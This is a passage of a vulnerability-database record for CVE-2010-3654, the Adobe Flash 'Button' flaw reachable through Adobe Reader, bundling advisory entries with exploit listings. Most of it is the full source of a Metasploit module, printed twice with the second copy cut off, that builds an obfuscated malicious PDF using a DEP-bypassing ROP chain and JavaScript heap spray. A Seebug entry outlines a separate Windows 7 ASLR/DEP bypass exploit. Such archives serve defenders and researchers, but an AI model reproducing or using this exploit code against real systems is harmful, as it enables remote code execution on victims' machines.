must open the exploit file in Adobe Reader. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2010-11-16T00:00:00", "published": "2010-11-16T00:00:00", "id": "SAINT:0F4E1C742351171F6A7E81111D6518CC", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_flash_content_parsing", "title": "Adobe Flash Player Flash Content Parsing Code Execution", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "edition": 2, "description": "Added: 11/16/2010 \nCVE: [CVE-2010-3654](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3654>) \nBID: [44504](<http://www.securityfocus.com/bid/44504>) \nOSVDB: [68932](<http://www.osvdb.org/68932>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nAdobe Reader 9.x is vulnerable to a remote code execution vulnerability as a result of parsing flash content by the bundled Adobe Flash Player. \n\n### Resolution\n\nApply the patches referenced in [APSA10-05](<http://www.adobe.com/support/security/advisories/apsa10-05.html>) when they become available. In the interim, follow the relevant directions for mitigating the vulnerability in Adobe Reader. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/298081> \n<http://secunia.com/advisories/42030/> \n\n\n### Limitations\n\nExploit works on Adobe Reader 9.4.0 and the user must open the exploit file in Adobe Reader. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-11-16T00:00:00", "published": "2010-11-16T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_flash_content_parsing", "id": "SAINT:81B135AB58085F29890F2C48E7DD9175", "type": "saint", "title": "Adobe Flash Player Flash Content Parsing Code Execution", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:45", "description": "", "published": "2010-11-03T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player \"Button\" Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "modified": "2010-11-03T00:00:00", "id": "PACKETSTORM:95444", "href": "https://packetstormsecurity.com/files/95444/Adobe-Flash-Player-Button-Remote-Code-Execution.html", "sourceData": "`## \n# $Id: adobe_flashplayer_button.rb 10857 2010-11-01 22:34:13Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \nrequire 'zlib' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player \"Button\" Remote Code Execution', \n'Description' => %q{ \nThis module exploits a vulnerability in the handling of certain SWF movies \nwithin versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat \nare also vulnerable, as are any other applications that may embed Flash player. \n \nArbitrary code execution is achieved by embedding a specially crafted Flash \nmovie into a PDF document. An AcroJS heap spray is used in order to ensure \nthat the memory used by the invalid pointer issue is controlled. \n \nNOTE: This module uses a similar DEP bypass method to that used within the \nadobe_libtiff module. This method is unlikely to work across various \nWindows versions due a the hardcoded syscall number. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Found being openly exploited \n'Haifei Li', # PoC \n'jduck' # Metasploit version \n], \n'Version' => '$Revision: 10857 $', \n'References' => \n[ \n['CVE', '2010-3654'], \n['OSVDB', '68932'], \n['BID', '44504'], \n['URL', 'http://www.adobe.com/support/security/advisories/apsa10-05.html'], \n['URL', 'http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/'], #PoC \n# For SWF->PDF embedding \n['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'InitialAutoRunScript' => 'migrate -f', \n'DisablePayloadHandler' => 'true', \n}, \n'Payload' => \n{ \n'Space' => 1000, \n'BadChars' => \"\\x00\", \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Tested OK via Adobe Reader 9.4.0 on Windows XP SP3 (uses flash 10.1.85.3) -jjd \n[ 'Automatic', { }], \n], \n'DisclosureDate' => 'Oct 28 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), \n], self.class) \nend \n \ndef exploit \nswf_data = make_swf() \njs_data = make_js(payload.encoded) \n \n# Create the pdf \npdf = make_pdf(swf_data, js_data) \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file...\") \n \nfile_create(pdf) \nend \n \ndef make_swf \n# load the static swf file \npath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2010-3654.swf\" ) \nfd = File.open( path, \"rb\" ) \nswf_data = fd.read(fd.stat.size) \nfd.close \nswf_data \nend \n \ndef make_js(encoded_payload) \n \n# The following executes a ret2lib using BIB.dll \n# The effect is to bypass DEP and execute the shellcode in an indirect way \nstack_data = [ \n0xc0c0c0c, \n0x7002fe1, # mov edx,[esi+0x18] / test edx,edx / je +0x12 / mov eax,[esi+0xc] / mov ecx,[esi+4] / push eax / push ecx / push esi / call edx \n0xcccccccc, \n0xcccccccc, \n0xc0c0c0c + 0x10, \n0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret \n0xcccccccc, \n0x70048ef, # xchg eax,esp / ret \n0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8] \n0xcccccccc, \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009033, # ret 0x18 \n0x7009084, # ret \n0xc0c0c0c, \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7001599, # pop ebp / ret \n0x10124, \n0x70072f7, # pop eax / ret \n0x10104, \n0x70015bb, # pop ecx / ret \n0x1000, \n0x700154d, # mov [eax], ecx / ret \n0x70015bb, # pop ecx / ret \n0x7ffe0300, # -- location of KiFastSystemCall \n0x7007fb2, # mov eax, [ecx] / ret \n0x70015bb, # pop ecx / ret \n0x10011, \n0x700a8ac, # mov [ecx], eax / xor eax,eax / ret \n0x70015bb, # pop ecx / ret \n0x10100, \n0x700a8ac, # mov [ecx], eax / xor eax,eax / ret \n0x70072f7, # pop eax / ret \n0x10011, \n0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?) \n0x7005c54, # pop esi / add esp,0x14 / ret \n0xffffffff, \n0x10100, \n0x0, \n0x10104, \n0x1000, \n0x40, \n# The next bit effectively copies data from the interleaved stack to the memory \n# pointed to by eax \n# The data copied is: \n# \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83 \n# \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff \n# \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90 \n0x700d731, # mov eax, [ebp-0x24] / ret \n0x70015bb, # pop ecx / ret \n0x9054905a, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x5815eb5a, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x18891a8b, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x8304c083, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xfb8104c2, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xc0c0c0c, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x5ebee75, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xffffe6e8, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x909090ff, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90909090, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90909090, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90ffffff, \n0x700154d, # mov [eax], ecx / ret \n0x700d731, # mov eax, [ebp-0x24] / ret \n0x700112f # call eax -- (execute stub to transition to full shellcode) \n].pack('V*') \n \nvar_unescape = rand_text_alpha(rand(100) + 1) \nvar_shellcode = rand_text_alpha(rand(100) + 1) \n \nvar_start = rand_text_alpha(rand(100) + 1) \n \nvar_s = 0x10000 \nvar_c = rand_text_alpha(rand(100) + 1) \nvar_b = rand_text_alpha(rand(100) + 1) \nvar_d = rand_text_alpha(rand(100) + 1) \nvar_3 = rand_text_alpha(rand(100) + 1) \nvar_i = rand_text_alpha(rand(100) + 1) \nvar_4 = rand_text_alpha(rand(100) + 1) \n \npayload_buf = '' \npayload_buf << stack_data \npayload_buf << encoded_payload \n \nescaped_payload = Rex::Text.to_unescape(payload_buf) \n \njs = %Q| \nvar #{var_unescape} = unescape; \nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' ); \nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" ); \nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c}; \n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2); \n#{var_b} += #{var_shellcode}; \n#{var_b} += #{var_c}; \n#{var_d} = #{var_b}.substring(0, #{var_s}/2); \nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d}; \n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2); \nvar #{var_4} = new Array(); \nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\"; \n| \n \njs \nend \n \ndef RandomNonASCIIString(count) \nresult = \"\" \ncount.times do \nresult << (rand(128) + 128).chr \nend \nresult \nend \n \ndef ioDef(id) \n\"%d 0 obj\\n\" % id \nend \n \ndef ioRef(id) \n\"%d 0 R\" % id \nend \n \n \n#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ \ndef nObfu(str) \nresult = \"\" \nstr.scan(/./u) do |c| \nif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' \nresult << \"#%x\" % c.unpack(\"C*\")[0] \nelse \nresult << c \nend \nend \nresult \nend \n \n \ndef ASCIIHexWhitespaceEncode(str) \nresult = \"\" \nwhitespace = \"\" \nstr.each_byte do |b| \nresult << whitespace << \"%02x\" % b \nwhitespace = \" \" * (rand(3) + 1) \nend \nresult << \">\" \nend \n \n \ndef make_pdf(swf, js) \n \nswf_name = rand_text_alpha(8 + rand(8)) + \".swf\" \n \nxref = [] \neol = \"\\n\" \nendobj = \"endobj\" << eol \n \n# Randomize PDF version? \npdf = \"%PDF-1.5\" << eol \n#pdf << \"%\" << RandomNonASCIIString(4) << eol \n \n# catalog \nxref << pdf.length \npdf << ioDef(1) << nObfu(\"<</Type/Catalog\") \npdf << nObfu(\"/Pages \") << ioRef(3) \npdf << nObfu(\"/OpenAction \") << ioRef(5) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# pages array \nxref << pdf.length \npdf << ioDef(3) << nObfu(\"<</Type/Pages/Count 1/Kids [\") << ioRef(4) << nObfu(\"]>>\") << eol << endobj \n \n# page 1 \nxref << pdf.length \npdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) \npdf << nObfu(\"/Annots [\") << ioRef(7) << nObfu(\"] \") \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# js action \nxref << pdf.length \npdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << eol << endobj \n \n# js stream \nxref << pdf.length \ncompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) \npdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol \npdf << \"stream\" << eol \npdf << compressed << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n# swf annotation object \nxref << pdf.length \npdf << ioDef(7) << nObfu(\"<</Type/Annot/Subtype/RichMedia\") \npdf << nObfu(\"/Rect [20 20 187 69] \") \npdf << nObfu(\"/RichMediaSettings \") << ioRef(8) \npdf << nObfu(\"/RichMediaContent \") << ioRef(9) \npdf << nObfu(\"/NM (\") << swf_name << nObfu(\")\") \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich media settings \nxref << pdf.length \npdf << ioDef(8) \npdf << nObfu(\"<</Type/RichMediaSettings/Subtype/Flash\") \npdf << nObfu(\"/Activation \") << ioRef(10) \npdf << nObfu(\"/Deactivation \") << ioRef(11) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich media content \nxref << pdf.length \npdf << ioDef(9) \npdf << nObfu(\"<</Type/RichMediaContent\") \npdf << nObfu(\"/Assets \") << ioRef(12) \npdf << nObfu(\"/Configurations [\") << ioRef(14) << \"]\" \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich media activation / deactivation \nxref << pdf.length \npdf << ioDef(10) \npdf << nObfu(\"<</Type/RichMediaActivation/Condition/PO>>\") \npdf << eol << endobj \n \nxref << pdf.length \npdf << ioDef(11) \npdf << nObfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\") \npdf << eol << endobj \n \n# rich media assets \nxref << pdf.length \npdf << ioDef(12) \npdf << nObfu(\"<</Names [(#{swf_name}) \") << ioRef(13) << nObfu(\"]>>\") \npdf << eol << endobj \n \n# swf embeded file ref \nxref << pdf.length \npdf << ioDef(13) \npdf << nObfu(\"<</Type/Filespec /EF <</F \") << ioRef(16) << nObfu(\">> /F(#{swf_name})>>\") \npdf << eol << endobj \n \n# rich media configuration \nxref << pdf.length \npdf << ioDef(14) \npdf << nObfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\") \npdf << nObfu(\"/Instances [\") << ioRef(15) << nObfu(\"]>>\") \npdf << eol << endobj \n \n# rich media isntance \nxref << pdf.length \npdf << ioDef(15) \npdf << nObfu(\"<</Type/RichMediaInstance/Subtype/Flash\") \npdf << nObfu(\"/Asset \") << ioRef(13) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# swf stream \n# NOTE: This data is already compressed, no need to compress it again... \nxref << pdf.length \npdf << ioDef(16) << nObfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol \npdf << \"stream\" << eol \npdf << swf << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n# trailing stuff \nxrefPosition = pdf.length \npdf << \"xref\" << eol \npdf << \"0 %d\" % (xref.length + 1) << eol \npdf << \"0000000000 65535 f\" << eol \nxref.each do |index| \npdf << \"%010d 00000 n\" % index << eol \nend \n \npdf << \"trailer\" << eol \npdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol \n \npdf << \"startxref\" << eol \npdf << xrefPosition.to_s() << eol \n \npdf << \"%%EOF\" << eol \npdf \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/95444/adobe_flashplayer_button.rb.txt"}], "canvas": [{"lastseen": "2019-05-29T17:19:23", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "description": "**Name**| adobe_flash_button \n---|--- \n**CVE**| CVE-2010-3654 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| adobe_flash_button \n**Notes**| CVE Name: CVE-2010-3654 \nVENDOR: Adobe \nNOTES: Exploitation through an PDF file is more reliable than with a \ndirect HTML/Flash exploit \nVersionsAffected: Adobe Acrobat Reader 9.4.0. \nRepeatability: \nReferences: http://www.adobe.com/support/security/advisories/apsa10-05.html \nDate public: 10/28/2010 \n\n", "edition": 2, "modified": "2010-10-29T19:00:00", "published": "2010-10-29T19:00:00", "id": "ADOBE_FLASH_BUTTON", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/adobe_flash_button", "type": "canvas", "title": "Immunity Canvas: ADOBE_FLASH_BUTTON", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T16:38:18", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Adobe Flash Player < 10.1.53 .64 Action Script Type Confusion Exploit (DEP+ASLR bypass)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71627", "id": "SSV:71627", "sourceData": "\n Source: http://www.abysssec.com/blog/2011/04/exploiting-adobe-flash-player-on-windows-7/\r\n\r\nAdobe Flash player Action script type confusion exploit (DEP+ASLR bypass)\r\n\r\nadvisory text : \r\n\r\nHere is another reliable windows 7 exploit . the main method used for exploitation is based on Haifei-li presentation at CanSecWest. \r\nbut as exploit code not relased and a lot of peoples like to see exploit code here is our code . \r\n\r\nexploitation detail :\r\nFor exploitation purpose on recent protections on windows 7 without any 3rd party (well flash is not 3rd party todays) , it is possible to use the same bug many times to leak the imageBase address and payload address. In our exploit we used three confusion to read String Objects address and accordingly imagebase address.\r\n\r\nStep1: read shellcode string object pointer by confusing it with uint and use it to leak ImageBase.\r\nStep2: leak address of the shellcode with the same pointer and NewNumber trick.\r\nStep3: send imageBase & shellcode address as parameters to the RopPayload function, develop Rop payload string and again confuse the return value with uint to read address of RopPayload string.\r\nStep4: send address of the rop payload as parameters to the last confused function that confuses string type with class object. And thus address of our rop payload will be used as vtable in the fake class object.\r\nNote: In using strings as a buffer for shellcode in action script, it is important to use alphanumeric characters because the toString method converts our ascii character set to uincode thus make our shellcode unusable.\r\n\r\nHere you can get our reliable exploit against windows 7 :\r\ncalc.exe payload\r\n\r\nhttp://www.exploit-db.com/sploits/CVE-2010-3654_Win7.zip\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71627"}, {"lastseen": "2017-11-19T13:27:45", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "type": "seebug", "title": "Adobe Flash Player \"Button\" Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71175", "id": "SSV:71175", "sourceData": "\n ##\r\n# $Id: adobe_flashplayer_button.rb 10857 2010-11-01 22:34:13Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire &#39;msf/core&#39;\r\nrequire &#39;zlib&#39;\r\n\r\nclass Metasploit3 &#60; Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t&#39;Name&#39; =&#62; &#39;Adobe Flash Player &#34;Button&#34; Remote Code Execution&#39;,\r\n\t\t\t&#39;Description&#39; =&#62; %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the handling of certain SWF movies\r\n\t\t\t\twithin versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat\r\n\t\t\t\tare also vulnerable, as are any other applications that may embed Flash player.\r\n\r\n\t\t\t\tArbitrary code execution is achieved by embedding a specially crafted Flash\r\n\t\t\t\tmovie into a PDF document. An AcroJS heap spray is used in order to ensure\r\n\t\t\t\tthat the memory used by the invalid pointer issue is controlled.\r\n\r\n\t\t\t\tNOTE: This module uses a similar DEP bypass method to that used within the\r\n\t\t\t\tadobe_libtiff module. This method is unlikely to work across various\r\n\t\t\t\tWindows versions due a the hardcoded syscall number.\r\n\t\t\t},\r\n\t\t\t&#39;License&#39; =&#62; MSF_LICENSE,\r\n\t\t\t&#39;Author&#39; =&#62;\r\n\t\t\t\t[\r\n\t\t\t\t\t&#39;Unknown&#39;, # Found being openly exploited\r\n\t\t\t\t\t&#39;Haifei Li&#39;, # PoC\r\n\t\t\t\t\t&#39;jduck&#39; # Metasploit version\r\n\t\t\t\t],\r\n\t\t\t&#39;Version&#39; =&#62; &#39;$Revision: 10857 $&#39;,\r\n\t\t\t&#39;References&#39; =&#62;\r\n\t\t\t\t[\r\n\t\t\t\t\t[&#39;CVE&#39;, &#39;2010-3654&#39;],\r\n\t\t\t\t\t[&#39;OSVDB&#39;, &#39;68932&#39;],\r\n\t\t\t\t\t[&#39;BID&#39;, &#39;44504&#39;],\r\n\t\t\t\t\t[&#39;URL&#39;, &#39;http://www.adobe.com/support/security/advisories/apsa10-05.html&#39;],\r\n\t\t\t\t\t[&#39;URL&#39;, &#39;http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/&#39;], #PoC\r\n\t\t\t\t\t# For SWF-&#62;PDF embedding\r\n\t\t\t\t\t[&#39;URL&#39;, &#39;http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/&#39;]\r\n\t\t\t\t],\r\n\t\t\t&#39;DefaultOptions&#39; =&#62;\r\n\t\t\t\t{\r\n\t\t\t\t\t&#39;EXITFUNC&#39; =&#62; &#39;process&#39;,\r\n\t\t\t\t\t&#39;InitialAutoRunScript&#39; =&#62; &#39;migrate -f&#39;,\r\n\t\t\t\t\t&#39;DisablePayloadHandler&#39; =&#62; &#39;true&#39;,\r\n\t\t\t\t},\r\n\t\t\t&#39;Payload&#39; =&#62;\r\n\t\t\t\t{\r\n\t\t\t\t\t&#39;Space&#39; =&#62; 1000,\r\n\t\t\t\t\t&#39;BadChars&#39; =&#62; &#34;\\x00&#34;,\r\n\t\t\t\t\t&#39;DisableNops&#39; =&#62; true\r\n\t\t\t\t},\r\n\t\t\t&#39;Platform&#39; =&#62; &#39;win&#39;,\r\n\t\t\t&#39;Targets&#39; =&#62;\r\n\t\t\t\t[\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.4.0 on Windows XP SP3 (uses flash 10.1.85.3) -jjd\r\n\t\t\t\t\t[ &#39;Automatic&#39;, { }],\r\n\t\t\t\t],\r\n\t\t\t&#39;DisclosureDate&#39; =&#62; &#39;Oct 28 2010&#39;,\r\n\t\t\t&#39;DefaultTarget&#39; =&#62; 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new(&#39;FILENAME&#39;, [ true, &#39;The file name.&#39;, &#39;msf.pdf&#39;]),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tswf_data = make_swf()\r\n\t\tjs_data = make_js(payload.encoded)\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(swf_data, js_data)\r\n\r\n\t\tprint_status(&#34;Creating &#39;#{datastore[&#39;FILENAME&#39;]}&#39; file...&#34;)\r\n\r\n\t\tfile_create(pdf)\r\n\tend\r\n\r\n\tdef make_swf\r\n\t\t# load the static swf file\r\n\t\tpath = File.join( Msf::Config.install_root, &#34;data&#34;, &#34;exploits&#34;, &#34;CVE-2010-3654.swf&#34; )\r\n\t\tfd = File.open( path, &#34;rb&#34; )\r\n\t\tswf_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\t\tswf_data\r\n\tend\r\n\r\n\tdef make_js(encoded_payload)\r\n\r\n\t\t# The following executes a ret2lib using BIB.dll\r\n\t\t# The effect is to bypass DEP and execute the shellcode in an indirect way\r\n\t\tstack_data = [\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7002fe1, # mov edx,[esi+0x18] / test edx,edx / je +0x12 / mov eax,[esi+0xc] / mov ecx,[esi+4] / push eax / push ecx / push esi / call edx\r\n\t\t\t0xcccccccc,\r\n\t\t\t0xcccccccc,\r\n\t\t\t0xc0c0c0c + 0x10,\r\n\t\t\t0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x70048ef, # xchg eax,esp / ret\r\n\t\t\t0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]\r\n\t\t\t0xcccccccc,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009033, # ret 0x18\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7009084, # ret\r\n\t\t\t0x7001599, # pop ebp / ret\r\n\t\t\t0x10124,\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10104,\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x1000,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x7ffe0300, # -- location of KiFastSystemCall\r\n\t\t\t0x7007fb2, # mov eax, [ecx] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10100,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)\r\n\t\t\t0x7005c54, # pop esi / add esp,0x14 / ret\r\n\t\t\t0xffffffff,\r\n\t\t\t0x10100,\r\n\t\t\t0x0,\r\n\t\t\t0x10104,\r\n\t\t\t0x1000,\r\n\t\t\t0x40,\r\n\t\t\t# The next bit effectively copies data from the interleaved stack to the memory\r\n\t\t\t# pointed to by eax\r\n\t\t\t# The data copied is:\r\n\t\t\t# \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83\r\n\t\t\t# \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff\r\n\t\t\t# \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x9054905a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5815eb5a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x18891a8b,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x8304c083,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xfb8104c2,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5ebee75,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xffffe6e8,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / 